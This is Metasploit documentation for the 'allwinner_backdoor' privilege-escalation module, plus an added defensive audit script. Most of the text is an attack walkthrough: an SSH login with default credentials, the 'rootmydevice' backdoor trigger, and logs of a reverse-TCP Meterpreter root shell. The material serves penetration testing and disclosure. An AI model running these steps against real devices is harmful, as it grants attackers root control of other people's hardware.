## Vulnerable Application

Vulnerable Allwinner SoC chips: H3, A83T or H8, on devices that rely on the vendor's Linux 3.4 kernel.

Vulnerable OS images:

* all OS images available for Orange Pis
* any image for FriendlyARM's NanoPi M1
* SinoVoip's M2+ and M3
* Cubietech's Cubietruck+
* Linksprite's pcDuino8 Uno

Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.

This module attempts to exploit a debug backdoor in Allwinner SoC based devices to
escalate privileges, implementing the Allwinner privilege escalation as documented in
[Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).
The backdoor is a simple debug kernel module shipped with the vendor kernel: when the
string "rootmydevice" is echoed to the interface it exposes, the shell that wrote it is
escalated to root.
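The following host-side audit script is an added example; it is not part of the Metasploit module or its documentation. It mirrors what the module's `check` command looks for, but only tests for the presence of the debug procfs entry and never writes to it. The entry path (`/proc/sunxi_debug/sunxi_debug`) is an assumption not stated on this page, and the `PREFIX` argument is there so the same check can be run against a copied filesystem tree rather than the live device.

```shell
#!/bin/sh
# Added audit example (not from the Metasploit module or its docs).
# Reports whether a host shows the two indicators described above:
#   1. the debug procfs entry exposed by the vendor's debug kernel module
#   2. a kernel in the 3.4 series used by the affected sunxi images
# The script only stats the entry; it never writes "rootmydevice" to it.

# Assumed location of the debug entry, relative to the filesystem root
# (this path is an assumption, not stated on the page).
SUNXI_DEBUG_ENTRY="proc/sunxi_debug/sunxi_debug"

# kernel_is_3_4 VERSION -> returns 0 when VERSION is a 3.4.x kernel
kernel_is_3_4() {
    case "$1" in
        3.4|3.4.*) return 0 ;;
        *) return 1 ;;
    esac
}

# backdoor_entry_present PREFIX -> returns 0 when the debug entry exists
# under PREFIX. PREFIX defaults to / (the live system); pass a directory
# to audit a copied or mounted filesystem tree instead.
backdoor_entry_present() {
    prefix="${1:-/}"
    [ -e "${prefix%/}/${SUNXI_DEBUG_ENTRY}" ]
}

# allwinner_backdoor_audit PREFIX KERNEL_VERSION -> prints a verdict and
# returns 0 when the backdoor entry is present, 1 otherwise. The kernel
# version is reported as supporting evidence but does not decide the verdict.
allwinner_backdoor_audit() {
    prefix="${1:-/}"
    kver="${2:-$(uname -r)}"
    verdict=1   # shell convention: 0 = indicator found, 1 = not found
    if backdoor_entry_present "$prefix"; then
        echo "[!] debug entry present: ${prefix%/}/${SUNXI_DEBUG_ENTRY}"
        verdict=0
    fi
    if kernel_is_3_4 "$kver"; then
        echo "[i] kernel $kver is in the 3.4 series used by the affected images"
    fi
    if [ "$verdict" -eq 0 ]; then
        echo "[!] host matches the allwinner_backdoor indicators"
    else
        echo "[+] debug entry not found under ${prefix%/}/"
    fi
    return "$verdict"
}

# Usage: sh allwinner_audit.sh / [kernel-version]
# The live check runs only when a prefix argument is given.
if [ "$#" -ge 1 ]; then
    allwinner_backdoor_audit "$@"
fi
```

Run it as `sh allwinner_audit.sh /` on the device itself, or point it at a mounted image (`sh allwinner_audit.sh /mnt/sdcard 3.4.39`) when checking a firmware build offline; a return code of 0 means the entry the module exploits is present.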


## Verification Steps

To use this module, you need a vulnerable device.

An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.

1. Start `msfconsole`
1. Get a session
1. Do: `use exploit/multi/local/allwinner_backdoor`
1. Do: `set SESSION [SESSION]`
1. Do: `set LHOST [LHOST]`
1. Do: `run`
1. You should get a new *root* session


## Options


## Scenarios

### Orange Pi running Ubuntu 14.04 (Linux 3.4.39)

- `use auxiliary/scanner/ssh/ssh_login`

```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio)
Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- `use exploit/multi/local/allwinner_backdoor`

```
msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*]  The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit
```

Successful exploitation:

```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.2.248
OS           : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter  : armle/linux
```
